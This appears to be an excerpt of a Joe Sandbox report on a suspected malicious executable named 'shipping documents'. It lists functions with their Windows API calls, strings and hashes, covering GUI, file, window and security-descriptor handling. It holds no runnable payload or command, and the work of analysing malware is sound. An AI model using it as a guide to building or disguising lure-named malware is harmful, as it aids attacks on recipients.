DragQueryPoint.SHELL32(?,?), ref: 006DC917

Part of subcall function 006DADF1: ClientToScreen.USER32(?,?), ref: 006DAE1A
Part of subcall function 006DADF1: GetWindowRect.USER32(?,?), ref: 006DAE90
Part of subcall function 006DADF1: PtInRect.USER32(?,?,006DC304), ref: 006DAEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 006DC980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006DC98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006DC9AE
_wcscat.LIBCMT ref: 006DC9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 006DC9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 006DCA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 006DCA25
SendMessageW.USER32(?,000000B1,?,?), ref: 006DCA47
DragFinish.SHELL32(?), ref: 006DCA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 006DCB41

Strings

@GUI_DRAGFILE, xrefs: 006DCAF0
prq, xrefs: 006DCA8B
@GUI_DROPID, xrefs: 006DCA6E
@GUI_DRAGID, xrefs: 006DCAB9

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prq
API String ID: 169749273-4109042146
Opcode ID: a1778f1cf90068c1f04a55e6e45a1b070f20ee4478d69fea7232d76dfb4590b8
Instruction ID: fa7f0d7806a282c5b4a8b61cf1eef20b6aa28eccf848ab30a027ce1eac2f44cd
Opcode Fuzzy Hash: a1778f1cf90068c1f04a55e6e45a1b070f20ee4478d69fea7232d76dfb4590b8
Instruction Fuzzy Hash: 87615B71508301AFC701DF64DC85D9FBBFAEF89710F004A2EF592962A1DB709A49CB66

Function 006AB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 006AB23F

Strings

CLASSNAME=, xrefs: 006AB27C
ACTIVE, xrefs: 006AB21A
[ACTIVE, xrefs: 006AB22C
[HANDLE:, xrefs: 006AB24B
LAST, xrefs: 006AB204
ALL, xrefs: 006AB2D3
[REGEXPTITLE:, xrefs: 006AB267
HANDLE=, xrefs: 006AB238
REGEXP=, xrefs: 006AB254
[ALL, xrefs: 006AB2E5
[CLASS:, xrefs: 006AB28F
[LAST, xrefs: 006AB2EC

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 87f5430dd593bcc69f4c9832b55b7cba659763724d958d8ff024e57b1a930ee3
Instruction ID: feddef4f8cb6dc9b7a30f4ede1bbe1149f37b8e537f6ed3fd8ebf214e045c5e0
Opcode Fuzzy Hash: 87f5430dd593bcc69f4c9832b55b7cba659763724d958d8ff024e57b1a930ee3
Instruction Fuzzy Hash: CF319E71904205E6DB50FA60DD43FEE77A69F21751F600229B901711D3EF566F08C999

Function 006AC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 006AC4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 006AC4E6
SetWindowTextW.USER32(?,?), ref: 006AC4FD
GetDlgItem.USER32(?,000003EA), ref: 006AC512
SetWindowTextW.USER32(00000000,?), ref: 006AC518
GetDlgItem.USER32(?,000003E9), ref: 006AC528
SetWindowTextW.USER32(00000000,?), ref: 006AC52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 006AC54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 006AC569
GetWindowRect.USER32(?,?), ref: 006AC572
SetWindowTextW.USER32(?,?), ref: 006AC5DD
GetDesktopWindow.USER32 ref: 006AC5E3
GetWindowRect.USER32(00000000), ref: 006AC5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 006AC636
GetClientRect.USER32(?,?), ref: 006AC643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 006AC668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 006AC693

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 5652f0fdce8100717e583226d8b45bd9bd513571e39768cb023fa32c2b6e029e
Instruction ID: d9ee03ca9ccc312faccddeb4b843a7f3945bf3b53ec6fad14fb1ca0b1254b05f
Opcode Fuzzy Hash: 5652f0fdce8100717e583226d8b45bd9bd513571e39768cb023fa32c2b6e029e
Instruction Fuzzy Hash: AA514C70900709AFDB20EFA8DD85BAEBBF6FF04715F004529E686A26A0D774E914CF50

Function 006DA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006DA4C8
DestroyWindow.USER32(?,?), ref: 006DA542

Part of subcall function 00657D2C: _memmove.LIBCMT ref: 00657D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006DA5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006DA5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006DA5F1
DestroyWindow.USER32(00000000), ref: 006DA613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00650000,00000000), ref: 006DA64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006DA663
GetDesktopWindow.USER32 ref: 006DA67C
GetWindowRect.USER32(00000000), ref: 006DA683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006DA69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006DA6B3

Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC

Strings

tooltips_class32, xrefs: 006DA5B5, 006DA643
0, xrefs: 006DA4DE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 09a82718b3d8ab6cff1d93debf66112b922e397c6030dc53e97c81d7828b44a2
Instruction ID: 97455ba9359c799947d4495cd405abd053bd506cf743809de26c09c5b76c1e89
Opcode Fuzzy Hash: 09a82718b3d8ab6cff1d93debf66112b922e397c6030dc53e97c81d7828b44a2
Instruction Fuzzy Hash: 99719C71944245EFD720CF68CC45FA677E6EB88304F088A2EF985873A0D775E906CB16

Function 006D4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006D46AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006D46F6

Strings

GETTOTALCOUNT, xrefs: 006D46DD
SELECT, xrefs: 006D48A7
GETTEXT, xrefs: 006D4849
GETITEMCOUNT, xrefs: 006D47D8
COLLAPSE, xrefs: 006D473C
GETSELECTED, xrefs: 006D4806
CHECK, xrefs: 006D4716
EXISTS, xrefs: 006D475F
ISCHECKED, xrefs: 006D4879
UNCHECK, xrefs: 006D48D2
EXPAND, xrefs: 006D47A8

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: c5a2b55ccd14b6d458f2116681b9f4027cbfb347de4f2abdff40ba1defad9db8
Instruction ID: 736fe5c90680beeb47fa3c521221aa1eb0cefef5d9a6744ef8ff087f18dfabca
Opcode Fuzzy Hash: c5a2b55ccd14b6d458f2116681b9f4027cbfb347de4f2abdff40ba1defad9db8
Instruction Fuzzy Hash: A5917B34604301DFCB54EF20C851A6AB7A3AF95354F04886EF8965B7A2CF35ED0ACB95

Function 006DBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006DBB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006D9431), ref: 006DBBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006DBC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006DBC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006DBC7D
FreeLibrary.KERNEL32(?), ref: 006DBC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006DBC99
DestroyIcon.USER32(?,?,?,?,?,006D9431), ref: 006DBCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006DBCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006DBCD1

Part of subcall function 0067313D: __wcsicmp_l.LIBCMT ref: 006731C6

Strings

.exe, xrefs: 006DBB04
.icl, xrefs: 006DBAE4
.dll, xrefs: 006DBB27

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: b195d082939941d17c9fcca6e4e76dccbefac8426e98435f41922f3c42ab0b84
Instruction ID: 908de9ff7d5c59f6345c529e86d977482ca9a35d189ffda7a1964aeedfb1490f
Opcode Fuzzy Hash: b195d082939941d17c9fcca6e4e76dccbefac8426e98435f41922f3c42ab0b84
Instruction Fuzzy Hash: D161BE71A00219FAEB14DF64CC45FFA77AAFB08711F10911AF815D62D1DBB4AA80CBA0

Function 006BA0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,006DFB78), ref: 006BA0FC

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 006BA11E
__swprintf.LIBCMT ref: 006BA177
__swprintf.LIBCMT ref: 006BA190
_wprintf.LIBCMT ref: 006BA246
_wprintf.LIBCMT ref: 006BA264

Strings

^ ERROR, xrefs: 006BA1E8
Line %d (File "%s"):, xrefs: 006BA171, 006BA18A
Error: , xrefs: 006BA20E
"%s" (%d) : ==> %s:, xrefs: 006BA25F
"%s" (%d) : ==> %s:%s%s, xrefs: 006BA241
%n, xrefs: 006BA0C9

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%n
API String ID: 311963372-3486102242
Opcode ID: 336f302365020424890dec998fd7da721c01fef24685ee21f7a993ac0151f90d
Instruction ID: 5065d54c3198ff42beebbff972541c76b539dd8b0e3a3a4bb5c89786f4868642
Opcode Fuzzy Hash: 336f302365020424890dec998fd7da721c01fef24685ee21f7a993ac0151f90d
Instruction Fuzzy Hash: C751D371800209BBCF55EBE0DD86EEEB77AAF04301F104169F905721A1EB356F88DB55

Function 006BA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

CharLowerBuffW.USER32(?,?), ref: 006BA636
GetDriveTypeW.KERNEL32 ref: 006BA683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006BA6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006BA702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006BA730

Part of subcall function 00657D2C: _memmove.LIBCMT ref: 00657D66

Strings

closed, xrefs: 006BA64A, 006BA653
open , xrefs: 006BA692
close, xrefs: 006BA63C
set cd door , xrefs: 006BA6D1
wait, xrefs: 006BA6ED
open, xrefs: 006BA65D
type cdaudio alias cd wait, xrefs: 006BA6AE
close cd wait, xrefs: 006BA71B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: c1f005afc1e33d08b1080746cfa968cdece389423aa49508a6f10cf732fa51b6
Instruction ID: 57f2174a1974b91acdb40c968e6ccf208db4e84535d9c4ff10fcd9f640a9c8df
Opcode Fuzzy Hash: c1f005afc1e33d08b1080746cfa968cdece389423aa49508a6f10cf732fa51b6
Instruction Fuzzy Hash: 33515BB51083049FC740EF20D8918AAB7F6FF84718F04896DF896572A1DB31EE0ACB52

Function 006BA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006BA47A
__swprintf.LIBCMT ref: 006BA49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 006BA4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006BA4FE
_memset.LIBCMT ref: 006BA51D
_wcsncpy.LIBCMT ref: 006BA559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006BA58E
CloseHandle.KERNEL32(00000000), ref: 006BA599
RemoveDirectoryW.KERNEL32(?), ref: 006BA5A2
CloseHandle.KERNEL32(00000000), ref: 006BA5AC

Strings

:, xrefs: 006BA4BD
\??\%s, xrefs: 006BA496
\, xrefs: 006BA4B2

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 1e7119c2dbd67ddad4249bd158936bd9bc309c5451d7fcd37b196ea45c15cdac
Instruction ID: 14d3250fd45fb7470b315bf70f2492fc01fad782480c332cebae08f573b642e0
Opcode Fuzzy Hash: 1e7119c2dbd67ddad4249bd158936bd9bc309c5451d7fcd37b196ea45c15cdac
Instruction Fuzzy Hash: 4131C3B2900119ABDB21DFA0DC48FEB33BEEF88701F1041B6F909D2260E77097848B65

Function 006BDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 006BDC7B
_wcscat.LIBCMT ref: 006BDC93
_wcscat.LIBCMT ref: 006BDCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006BDCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 006BDCCE
GetFileAttributesW.KERNEL32(?), ref: 006BDCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 006BDD00
SetCurrentDirectoryW.KERNEL32(?), ref: 006BDD12

Strings

*.*, xrefs: 006BDD51

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: df4ba5cae5187c4770bea8c653505845acd15784ef650fb615447a06f8ebcf76
Instruction ID: f34f855f79d052ec5967bb01d3bb90ae77583259a75293af0bca4cbac0a39163
Opcode Fuzzy Hash: df4ba5cae5187c4770bea8c653505845acd15784ef650fb615447a06f8ebcf76
Instruction Fuzzy Hash: 7C8181F55042419FCB64DF24C8459EAB7EABF88350F19882EF88ACB251F734D985CB52

Function 006DC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006DC4EC
GetFocus.USER32 ref: 006DC4FC
GetDlgCtrlID.USER32(00000000), ref: 006DC507
_memset.LIBCMT ref: 006DC632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 006DC65D
GetMenuItemCount.USER32(?), ref: 006DC67D
GetMenuItemID.USER32(?,00000000), ref: 006DC690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 006DC6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 006DC70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006DC744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 006DC779

Strings

0, xrefs: 006DC62A

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: dae2403a8352766cbc8f5ba8928e8c01301f5f138de148919280de7289af6a50
Instruction ID: 895e8a1fbe874dcf3bb55e783ed3a0de78fe408b515a0169414cda3a69d433b3
Opcode Fuzzy Hash: dae2403a8352766cbc8f5ba8928e8c01301f5f138de148919280de7289af6a50
Instruction Fuzzy Hash: 7B816E70A083469FD710CF14D984AABBBEAFB88324F10452EF99597391D730E905DFA2

Function 006A83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006A8766
Part of subcall function 006A874A: GetLastError.KERNEL32(?,006A822A,?,?,?), ref: 006A8770
Part of subcall function 006A874A: GetProcessHeap.KERNEL32(00000008,?,?,006A822A,?,?,?), ref: 006A877F
Part of subcall function 006A874A: HeapAlloc.KERNEL32(00000000,?,006A822A,?,?,?), ref: 006A8786
Part of subcall function 006A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006A879D

Part of subcall function 006A87E7: GetProcessHeap.KERNEL32(00000008,006A8240,00000000,00000000,?,006A8240,?), ref: 006A87F3
Part of subcall function 006A87E7: HeapAlloc.KERNEL32(00000000,?,006A8240,?), ref: 006A87FA
Part of subcall function 006A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006A8240,?), ref: 006A880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006A8458
_memset.LIBCMT ref: 006A846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006A848C
GetLengthSid.ADVAPI32(?), ref: 006A849D
GetAce.ADVAPI32(?,00000000,?), ref: 006A84DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006A84F6
GetLengthSid.ADVAPI32(?), ref: 006A8513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006A8522
HeapAlloc.KERNEL32(00000000), ref: 006A8529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 006A854A
CopySid.ADVAPI32(00000000), ref: 006A8551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006A8582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006A85A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 006A85BC

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 49142e0410ece62f34013bc835ecd100de6af0c8e146b7ca28cbb7b2ed5889b9
Instruction ID: 1af1a71d08fe7d67b522f8d25b4f48b74bb46f30495ce3b312ce739b60bc9e8a
Opcode Fuzzy Hash: 49142e0410ece62f34013bc835ecd100de6af0c8e146b7ca28cbb7b2ed5889b9
Instruction Fuzzy Hash: 6F611871D00209AFDF54AFA4DC45AEEBBBAFF05300B14816AF915A7291DB31AE15CF60

Function 006C762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 006C76A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006C76AE
CreateCompatibleDC.GDI32(?), ref: 006C76BA
SelectObject.GDI32(00000000,?), ref: 006C76C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 006C771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 006C7757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 006C777B
SelectObject.GDI32(00000006,?), ref: 006C7783
DeleteObject.GDI32(?), ref: 006C778C
DeleteDC.GDI32(00000006), ref: 006C7793
ReleaseDC.USER32(00000000,?), ref: 006C779E

Strings

(, xrefs: 006C7723

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

